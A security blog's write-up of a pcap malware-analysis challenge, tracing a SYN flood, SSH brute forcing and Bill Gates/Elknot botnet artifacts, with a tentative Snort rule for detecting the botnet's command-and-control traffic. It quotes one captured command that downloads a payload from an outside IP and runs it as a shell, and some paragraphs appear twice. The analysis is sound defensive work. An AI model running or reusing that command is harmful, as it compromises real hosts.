Looks like the third annual FireEye Flare-On Challenge is back in full swing. Anyone interested in reverse engineering and malware analysis may want to take a look at it. Note: It does contain real malware, so be careful with it. Good luck to those who try it.
https://www.fireeye.com/blog/threat-research/2016/09/_announcing_the_thir.html
Monday, September 26, 2016
Tek Defense Challenge
Spotted a challenge on my Twitter feed a week or two ago. Finally decided to take a look at it. The challenge has a pcap. The author very clearly states that the pcap contains malware. Looking at the pcap it is evident that the author is correct. One IP address , 104.236.210.97, seems to be getting hit with SYN packets on different ports from different IP addresses. This type of attack is called a SYN flood. Another IP Address, 46.101.128.129, seems to be trying to find and exploit potential vulnerabilities on this machine, 104.236.210.97, and other machines. It uses "SIPvicious" to enumerate hosts on the same network as the machine. It also tries to take advantage of the network time protocol. I have heard of using vulnerable NTP servers in amplification attacks. It appears as though this could have been used to assist in a DDoS attack. It finally exploited 104.236.210.97 by brute forcing the root SSH password. After the password was brute forced, the machine was directed to a malicious website. The image sources on the website were malicious files. Also found what may have been an attack on Netcore. In packets 62019-62022, it appears as though someone may have exploited a buffer overflow vulnerability then they passed a command that created a shell for them. The command that was passed was "cd /tmp || cd /var/ || cd /dev/; busy box tftp -r min -g 91.134.141.49; cp /bin/sh .; cat min > sh; chmod 777 sh; ./sh".
I used Wireshark to analyze the pcap. Tcpdump is a good choice as well, if one is familiar with how to use the filters. One of my favorite features of Wireshark is the File/Export Objects menu item. I exported the http files to gather some interesting artifacts. Malware can't always be found using this, because some malware authors have found more sophisticated methods of hiding malware, like encryption, obfuscation, encoding traffic, etc. Another one of my favorite features of Wireshark is the ability to look at the Statistics/Protocol Hierarchy so that I can see exactly what protocols/ports are in use in the traffic, and what is the most traffic. Some protocols are readable without extra knowledge, making them easy to analyze. I also like the Statistics/Conversations, and Statistics/Endpoints. This helped me determine that 104.236.210.97 was being SYN flooded.
After I dumped the files into a directory, I compressed the directory and submitted it to VirusTotal. The Antivirus engines on VirusTotal gave different names for the malware contained in the files. I'm inclined to believe that it's the malware used in the Bill Gates botnet. The reason I believe that it is the malware from the Bill Gates botnet is that I used the terminal and the strings command to analyze some of the malicious files, and it wasn't exactly subtle about what it was. It had "Bill" and "Gates" written all over it, literally. Some antivirus engines were calling it Elknot.
I created MD5 hashes of all of the files in the directory, to see if some of the files were the same, or if the hashes of the files were associated with other submissions to VirusTotal. Found out that the pcap itself was submitted for analysis.
After doing research, I found out that the Bill Gates botnet malware contains some of the source code from Elknot, where the author(s) reused code. I also found this nice pdf about the Bill Gates bot net.
I used Wireshark to analyze the pcap. Tcpdump is a good choice as well, if one is familiar with how to use the filters. One of my favorite features of Wireshark is the File/Export Objects menu item. I exported the http files to gather some interesting artifacts. Malware can't always be found using this, because some malware authors have found more sophisticated methods of hiding malware, like encryption, obfuscation, encoding traffic, etc. Another one of my favorite features of Wireshark is the ability to look at the Statistics/Protocol Hierarchy so that I can see exactly what protocols/ports are in use in the traffic, and what is the most traffic. Some protocols are readable without extra knowledge, making them easy to analyze. I also like the Statistics/Conversations, and Statistics/Endpoints. This helped me determine that 104.236.210.97 was being SYN flooded.
After I dumped the files into a directory, I compressed the directory and submitted it to VirusTotal. The Antivirus engines on VirusTotal gave different names for the malware contained in the files. I'm inclined to believe that it's the malware used in the Bill Gates botnet. The reason I believe that it is the malware from the Bill Gates botnet is that I used the terminal and the strings command to analyze some of the malicious files, and it wasn't exactly subtle about what it was. It had "Bill" and "Gates" written all over it, literally. Some antivirus engines were calling it Elknot.
I created MD5 hashes of all of the files in the directory, to see if some of the files were the same, or if the hashes of the files were associated with other submissions to VirusTotal. Found out that the pcap itself was submitted for analysis.
After doing research, I found out that the Bill Gates botnet malware contains some of the source code from Elknot, where the author(s) reused code. I also found this nice pdf about the Bill Gates bot net.
https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf
The article describes a tcpdump filter to find the initial communication to a command & control server. When running the filter on this pcap, there was communication from the IP 104.236.210.97 —> 118.192.137.245. The 118.192.137.245 IP Address was submitted to Virus Total. Virus Total shows that malicious files have been served from this IP Address, including some of the artifacts in this pcap. The malware served on the website is the WebToos Trojan, Prockill-A Rootkill, and a Backdoor/Downloader.
I'm listing some of the artifacts found in this pcap below:
The files that VirusTotal found to be malicious were:
back(1).pl —> 3 of 57 scanners noted that it was malicious
-backdoor
-trojan
-examining the file, using the strings command, one fines that it is a perl script that sends a shell
to the person using it.
-according to the MD5 hash, this file is the same file as back.pl
back.pl —> 3 of 57 scanners noted that it was malicious
-backdoor
-trojan
-examining the file, one fines that it is a perl script that sends a shell to the person using
it.
-according to the MD5 hash, this file is the same file as back(1).pl
2.6.32 —> 27 of 55 scanners determined that it was malicious
-Linux Exploit
-Trojan
-CVE 2013 2094
-Cornet GEN 1364(B)
java.log —> 29 of 55 scanners determined that it was malicious
-Linux Billgates.G
-Backdoor
-SETag
-DDOS
-Chikdos
SYN_1902 —> 31 of 56 scanners determined that it was malicious
-Linux Billgates.G
-Backdoor
-SETag
-DDOS
-Chikdos
xmapp —> 33 of 56 scanners determined that it was malicious
-Backdoor.Gates.9
-Backdoor
-SETag
-Elknot-AE
-Chikdos
Trustr —> 33 of 55 scanners determined that it was malicious
-Linux Billgates.G
-Elknot_AE
-SETag
-Gates.9
-Backdoor
-Trojan
-according to MD5 hash, it is the same file as SYN
16081 —> 33 of 55 found that this file was malicious
-Linux Billgates.G
-SETag
-Backdoor
-Trojan
SYN —> 33 of 55 scanners determined that it was malicious
-Linux Billgates.G
-Elknot_AE
-SETag
-Gates.9
-Backdoor
-Trojan
-according to MD5 hash, it is the same file as Trustr
nc.exe —> 38 of 57 scanners determined that it was malicious
-riskware
-hack tool
-example of a false positive. nc.exe isn’t usually malicious in of itself. It is used to
create connections between computers.
-according to MD5 hash, it is the same file as nc(1).exe.
nc(1).exe—> 38 of 57 scanners determined that it was malicious
-riskware
-hack tool
-example of a false positive. nc.exe isn’t usually malicious in of itself. It is used to
create connections between computers.
-according to MD5 hash, it is the same file as nc.exe.
winappes.exe —> 52 of 58 scanners found this file to be malicious
-Backdoor
-Trojan
-Win32.Prockill.A
-Eldorado
-Rootkit
-Webtoos
-according to MD5 hash, same file as Windows_1902
Windows_1902—> 52 of 58 scanners found this file to be malicious
-Backdoor
-Trojan
-Win32.Prockill.A
-Eldorado
-Rootkit
-Webtoos
-Gates.8
-Artemis
-according to MD5 hash, same file as winappes.exe
Other files didn’t detect as being malicious, but they were suspicious.
%2F
-according to MD5 hash-same file as index.html.1, and index.html(1).1
-when using strings on this file, there is a link to a website that explains how to create an
Http File Server (HFS)-http://www.rejetto.com/hfs
-this file is written in http, indicating that it may be a web page, and it has malicious files
as image sources. If someone requests the page, these files will be downloaded.
index.html.1
-according to MD5 hash-same file as %2F, and index.html(1).1
-when using strings on this file, there is a link to a website that explains how to create an
Http File Server (HFS)-http://www.rejetto.com/hfs
-this file is written in http, indicating that it may be a web page, and it has malicious files
as image sources. If someone requests the page, these files will be downloaded.
index.html(1).1
-according to MD5 hash-same file as %2F, and index.html(1).1
-when using strings on this file, there is a link to a website that explains how to create an
Http File Server (HFS)-http://www.rejetto.com/hfs
-this file is written in http, indicating that it may be a web page, and it has malicious files
as image sources. If someone requests the page, these files will be downloaded.
Files with the same hash that didn’t detect as malicious. These are suspicious. (When looking up the hash of these files on VirusTotal, someone indicated that it is "snorkerz.bat" They state that is is a CRDF.Malware.Generic.1117511951)
cfbeaf604823f038b8b46f0ac862b98c ./apache2_2.4.18-2ubuntu3.1_amd64.deb
cfbeaf604823f038b8b46f0ac862b98c ./apache2-bin_2.4.18-2ubuntu3.1_amd64.deb
cfbeaf604823f038b8b46f0ac862b98c ./apache2-data_2.4.18-2ubuntu3.1_all.deb
cfbeaf604823f038b8b46f0ac862b98c ./apache2-utils_2.4.18-2ubuntu3.1_amd64.deb
cfbeaf604823f038b8b46f0ac862b98c ./libapr1_1.5.2-3_amd64.deb
cfbeaf604823f038b8b46f0ac862b98c ./libaprutil1_1.5.4-1build1_amd64.deb
cfbeaf604823f038b8b46f0ac862b98c ./libaprutil1-dbd-sqlite3_1.5.4-1build1_amd64.deb
cfbeaf604823f038b8b46f0ac862b98c ./libaprutil1-ldap_1.5.4-1build1_amd64.deb
cfbeaf604823f038b8b46f0ac862b98c ./liblua5.1-0_5.1.5-8ubuntu1_amd64.deb
cfbeaf604823f038b8b46f0ac862b98c ./ssl-cert_1.0.37_all.deb
I tried to write a Snort rule to find the initial C&C communication as described in the article, but I'm not familiar with writing Snort rules.
This may result in many false positives. This rule is based on the tcpdump filter for detecting the initial connection between the compromised computer and the command and control (C&C) server.
alert tcp any any -> any any (msg: “Potential communication with Bill Gates C&C”; content:”|01000000|”; depth: 4; content:”|3a47|; distance: 0;)
I found an article with rules for detecting SIPvicious. http://blog.sipvicious.org/2008/02/detecting-sip-attacks-with-snort.html
Subscribe to:
Posts (Atom)